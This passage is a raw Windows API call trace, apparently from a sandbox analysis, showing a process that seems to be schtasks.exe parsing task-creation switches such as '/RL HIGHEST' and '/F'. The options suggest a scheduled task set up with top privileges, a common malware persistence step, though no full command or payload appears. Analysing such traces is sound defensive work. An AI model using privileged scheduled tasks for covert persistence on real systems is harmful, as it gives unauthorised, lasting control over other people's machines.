_memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.401] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.401] lstrlenW (lpString="|tr|") returned 4 [0288.401] lstrlenW (lpString="|RL|") returned 4 [0288.401] StrStrIW (lpFirst="|tr|", lpSrch="|RL|") returned 0x0 [0288.401] RtlRestoreLastWin32Error () returned 0x490 [0288.401] lstrlenW (lpString="st") returned 2 [0288.401] lstrlenW (lpString="st") returned 2 [0288.401] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|st|") returned 4 [0288.401] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.401] lstrlenW (lpString="|st|") returned 4 [0288.401] lstrlenW (lpString="|RL|") returned 4 [0288.401] StrStrIW (lpFirst="|st|", lpSrch="|RL|") returned 0x0 [0288.401] RtlRestoreLastWin32Error () returned 0x490 [0288.401] lstrlenW (lpString="sd") returned 2 [0288.401] lstrlenW (lpString="sd") returned 2 [0288.401] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sd|") returned 4 [0288.401] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.401] lstrlenW (lpString="|sd|") returned 4 [0288.401] lstrlenW (lpString="|RL|") returned 4 [0288.401] StrStrIW (lpFirst="|sd|", lpSrch="|RL|") returned 0x0 [0288.401] RtlRestoreLastWin32Error () returned 0x490 [0288.401] lstrlenW (lpString="ed") returned 2 [0288.401] lstrlenW (lpString="ed") returned 2 [0288.401] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ed|") returned 4 [0288.401] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.401] lstrlenW (lpString="|ed|") returned 4 [0288.401] lstrlenW (lpString="|RL|") returned 4 [0288.401] StrStrIW (lpFirst="|ed|", lpSrch="|RL|") returned 0x0 [0288.401] RtlRestoreLastWin32Error () returned 0x490 [0288.401] lstrlenW (lpString="it") returned 2 [0288.401] lstrlenW (lpString="it") returned 2 [0288.401] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.401] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|it|") returned 4 [0288.401] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.401] lstrlenW (lpString="|it|") returned 4 [0288.401] lstrlenW (lpString="|RL|") returned 4 [0288.401] StrStrIW (lpFirst="|it|", lpSrch="|RL|") returned 0x0 [0288.402] RtlRestoreLastWin32Error () returned 0x490 [0288.402] lstrlenW (lpString="et") returned 2 [0288.402] lstrlenW (lpString="et") returned 2 [0288.402] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|et|") returned 4 [0288.402] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.402] lstrlenW (lpString="|et|") returned 4 [0288.402] lstrlenW (lpString="|RL|") returned 4 [0288.402] StrStrIW (lpFirst="|et|", lpSrch="|RL|") returned 0x0 [0288.402] RtlRestoreLastWin32Error () returned 0x490 [0288.402] lstrlenW (lpString="k") returned 1 [0288.402] lstrlenW (lpString="k") returned 1 [0288.402] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|k|") returned 3 [0288.402] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.402] lstrlenW (lpString="|k|") returned 3 [0288.402] lstrlenW (lpString="|RL|") returned 4 [0288.402] RtlRestoreLastWin32Error () returned 0x490 [0288.402] lstrlenW (lpString="du") returned 2 [0288.402] lstrlenW (lpString="du") returned 2 [0288.402] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.402] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|du|") returned 4 [0288.402] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.402] lstrlenW (lpString="|du|") returned 4 [0288.402] lstrlenW (lpString="|RL|") returned 4 [0288.402] StrStrIW (lpFirst="|du|", lpSrch="|RL|") returned 0x0 [0288.402] RtlRestoreLastWin32Error () returned 0x490 [0288.402] lstrlenW (lpString="ri") returned 2 [0288.402] lstrlenW (lpString="ri") returned 2 [0288.402] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ri|") returned 4 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.403] lstrlenW (lpString="|ri|") returned 4 [0288.403] lstrlenW (lpString="|RL|") returned 4 [0288.403] StrStrIW (lpFirst="|ri|", lpSrch="|RL|") returned 0x0 [0288.403] RtlRestoreLastWin32Error () returned 0x490 [0288.403] lstrlenW (lpString="z") returned 1 [0288.403] lstrlenW (lpString="z") returned 1 [0288.403] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|z|") returned 3 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.403] lstrlenW (lpString="|z|") returned 3 [0288.403] lstrlenW (lpString="|RL|") returned 4 [0288.403] RtlRestoreLastWin32Error () returned 0x490 [0288.403] lstrlenW (lpString="f") returned 1 [0288.403] lstrlenW (lpString="f") returned 1 [0288.403] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|f|") returned 3 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.403] lstrlenW (lpString="|f|") returned 3 [0288.403] lstrlenW (lpString="|RL|") returned 4 [0288.403] RtlRestoreLastWin32Error () returned 0x490 [0288.403] lstrlenW (lpString="v1") returned 2 [0288.403] lstrlenW (lpString="v1") returned 2 [0288.403] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|v1|") returned 4 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.403] lstrlenW (lpString="|v1|") returned 4 [0288.403] lstrlenW (lpString="|RL|") returned 4 [0288.403] StrStrIW (lpFirst="|v1|", lpSrch="|RL|") returned 0x0 [0288.403] RtlRestoreLastWin32Error () returned 0x490 [0288.403] lstrlenW (lpString="xml") returned 3 [0288.403] lstrlenW (lpString="xml") returned 3 [0288.403] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|xml|") returned 5 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.403] lstrlenW (lpString="|xml|") returned 5 [0288.403] lstrlenW (lpString="|RL|") returned 4 [0288.403] StrStrIW (lpFirst="|xml|", lpSrch="|RL|") returned 0x0 [0288.403] RtlRestoreLastWin32Error () returned 0x490 [0288.403] lstrlenW (lpString="ec") returned 2 [0288.403] lstrlenW (lpString="ec") returned 2 [0288.403] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.403] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ec|") returned 4 [0288.403] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.404] lstrlenW (lpString="|ec|") returned 4 [0288.404] lstrlenW (lpString="|RL|") returned 4 [0288.404] StrStrIW (lpFirst="|ec|", lpSrch="|RL|") returned 0x0 [0288.404] RtlRestoreLastWin32Error () returned 0x490 [0288.404] lstrlenW (lpString="rl") returned 2 [0288.404] lstrlenW (lpString="rl") returned 2 [0288.404] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.404] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.404] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rl|") returned 4 [0288.404] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.404] lstrlenW (lpString="|rl|") returned 4 [0288.404] lstrlenW (lpString="|RL|") returned 4 [0288.404] StrStrIW (lpFirst="|rl|", lpSrch="|RL|") returned="|rl|" [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] lstrlenW (lpString="-/") returned 2 [0288.404] StrChrIW (lpStart="-/", wMatch=0x52b0048) returned 0x0 [0288.404] RtlRestoreLastWin32Error () returned 0x490 [0288.404] RtlRestoreLastWin32Error () returned 0x490 [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0288.404] RtlRestoreLastWin32Error () returned 0x490 [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] _memicmp (_Buf1=0xde7620, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] lstrlenW (lpString=" \x09") returned 2 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0288.404] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0288.404] GetLastError () returned 0x0 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] lstrlenW (lpString="HIGHEST") returned 7 [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] RtlRestoreLastWin32Error () returned 0x0 [0288.404] lstrlenW (lpString="/F") returned 2 [0288.404] lstrlenW (lpString="-/") returned 2 [0288.404] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.404] lstrlenW (lpString="create") returned 6 [0288.404] lstrlenW (lpString="create") returned 6 [0288.404] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.404] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.404] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.404] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.404] lstrlenW (lpString="|create|") returned 8 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.405] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0288.405] RtlRestoreLastWin32Error () returned 0x490 [0288.405] lstrlenW (lpString="?") returned 1 [0288.405] lstrlenW (lpString="?") returned 1 [0288.405] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.405] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.405] lstrlenW (lpString="|?|") returned 3 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.405] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0288.405] RtlRestoreLastWin32Error () returned 0x490 [0288.405] lstrlenW (lpString="s") returned 1 [0288.405] lstrlenW (lpString="s") returned 1 [0288.405] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.405] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.405] lstrlenW (lpString="|s|") returned 3 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.405] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0288.405] RtlRestoreLastWin32Error () returned 0x490 [0288.405] lstrlenW (lpString="u") returned 1 [0288.405] lstrlenW (lpString="u") returned 1 [0288.405] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.405] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.405] lstrlenW (lpString="|u|") returned 3 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.405] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0288.405] RtlRestoreLastWin32Error () returned 0x490 [0288.405] lstrlenW (lpString="p") returned 1 [0288.405] lstrlenW (lpString="p") returned 1 [0288.405] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.405] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.405] lstrlenW (lpString="|p|") returned 3 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.405] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0288.405] RtlRestoreLastWin32Error () returned 0x490 [0288.405] lstrlenW (lpString="ru") returned 2 [0288.405] lstrlenW (lpString="ru") returned 2 [0288.405] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.405] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.405] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.405] lstrlenW (lpString="|ru|") returned 4 [0288.405] lstrlenW (lpString="|F|") returned 3 [0288.406] StrStrIW (lpFirst="|ru|", lpSrch="|F|") returned 0x0 [0288.406] RtlRestoreLastWin32Error () returned 0x490 [0288.406] lstrlenW (lpString="rp") returned 2 [0288.406] lstrlenW (lpString="rp") returned 2 [0288.406] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.406] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.406] lstrlenW (lpString="|rp|") returned 4 [0288.406] lstrlenW (lpString="|F|") returned 3 [0288.406] StrStrIW (lpFirst="|rp|", lpSrch="|F|") returned 0x0 [0288.406] RtlRestoreLastWin32Error () returned 0x490 [0288.406] lstrlenW (lpString="sc") returned 2 [0288.406] lstrlenW (lpString="sc") returned 2 [0288.406] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.406] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.406] lstrlenW (lpString="|sc|") returned 4 [0288.406] lstrlenW (lpString="|F|") returned 3 [0288.406] StrStrIW (lpFirst="|sc|", lpSrch="|F|") returned 0x0 [0288.406] RtlRestoreLastWin32Error () returned 0x490 [0288.406] lstrlenW (lpString="mo") returned 2 [0288.406] lstrlenW (lpString="mo") returned 2 [0288.406] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.406] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.406] lstrlenW (lpString="|mo|") returned 4 [0288.406] lstrlenW (lpString="|F|") returned 3 [0288.406] StrStrIW (lpFirst="|mo|", lpSrch="|F|") returned 0x0 [0288.406] RtlRestoreLastWin32Error () returned 0x490 [0288.406] lstrlenW (lpString="d") returned 1 [0288.406] lstrlenW (lpString="d") returned 1 [0288.406] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|d|") returned 3 [0288.406] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.406] lstrlenW (lpString="|d|") returned 3 [0288.406] lstrlenW (lpString="|F|") returned 3 [0288.406] StrStrIW (lpFirst="|d|", lpSrch="|F|") returned 0x0 [0288.406] RtlRestoreLastWin32Error () returned 0x490 [0288.406] lstrlenW (lpString="m") returned 1 [0288.406] lstrlenW (lpString="m") returned 1 [0288.406] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.406] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|m|") returned 3 [0288.406] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.406] lstrlenW (lpString="|m|") returned 3 [0288.406] lstrlenW (lpString="|F|") returned 3 [0288.407] StrStrIW (lpFirst="|m|", lpSrch="|F|") returned 0x0 [0288.407] RtlRestoreLastWin32Error () returned 0x490 [0288.407] lstrlenW (lpString="i") returned 1 [0288.407] lstrlenW (lpString="i") returned 1 [0288.407] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|i|") returned 3 [0288.407] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.407] lstrlenW (lpString="|i|") returned 3 [0288.407] lstrlenW (lpString="|F|") returned 3 [0288.407] StrStrIW (lpFirst="|i|", lpSrch="|F|") returned 0x0 [0288.407] RtlRestoreLastWin32Error () returned 0x490 [0288.407] lstrlenW (lpString="tn") returned 2 [0288.407] lstrlenW (lpString="tn") returned 2 [0288.407] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.407] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.407] lstrlenW (lpString="|tn|") returned 4 [0288.407] lstrlenW (lpString="|F|") returned 3 [0288.407] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0288.407] RtlRestoreLastWin32Error () returned 0x490 [0288.407] lstrlenW (lpString="tr") returned 2 [0288.407] lstrlenW (lpString="tr") returned 2 [0288.407] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.407] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.407] lstrlenW (lpString="|tr|") returned 4 [0288.407] lstrlenW (lpString="|F|") returned 3 [0288.407] StrStrIW (lpFirst="|tr|", lpSrch="|F|") returned 0x0 [0288.407] RtlRestoreLastWin32Error () returned 0x490 [0288.407] lstrlenW (lpString="st") returned 2 [0288.407] lstrlenW (lpString="st") returned 2 [0288.407] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|st|") returned 4 [0288.407] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.407] lstrlenW (lpString="|st|") returned 4 [0288.407] lstrlenW (lpString="|F|") returned 3 [0288.407] StrStrIW (lpFirst="|st|", lpSrch="|F|") returned 0x0 [0288.407] RtlRestoreLastWin32Error () returned 0x490 [0288.407] lstrlenW (lpString="sd") returned 2 [0288.407] lstrlenW (lpString="sd") returned 2 [0288.407] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.407] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sd|") returned 4 [0288.407] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.407] lstrlenW (lpString="|sd|") returned 4 [0288.407] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|sd|", lpSrch="|F|") returned 0x0 [0288.408] RtlRestoreLastWin32Error () returned 0x490 [0288.408] lstrlenW (lpString="ed") returned 2 [0288.408] lstrlenW (lpString="ed") returned 2 [0288.408] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ed|") returned 4 [0288.408] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.408] lstrlenW (lpString="|ed|") returned 4 [0288.408] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|ed|", lpSrch="|F|") returned 0x0 [0288.408] RtlRestoreLastWin32Error () returned 0x490 [0288.408] lstrlenW (lpString="it") returned 2 [0288.408] lstrlenW (lpString="it") returned 2 [0288.408] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|it|") returned 4 [0288.408] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.408] lstrlenW (lpString="|it|") returned 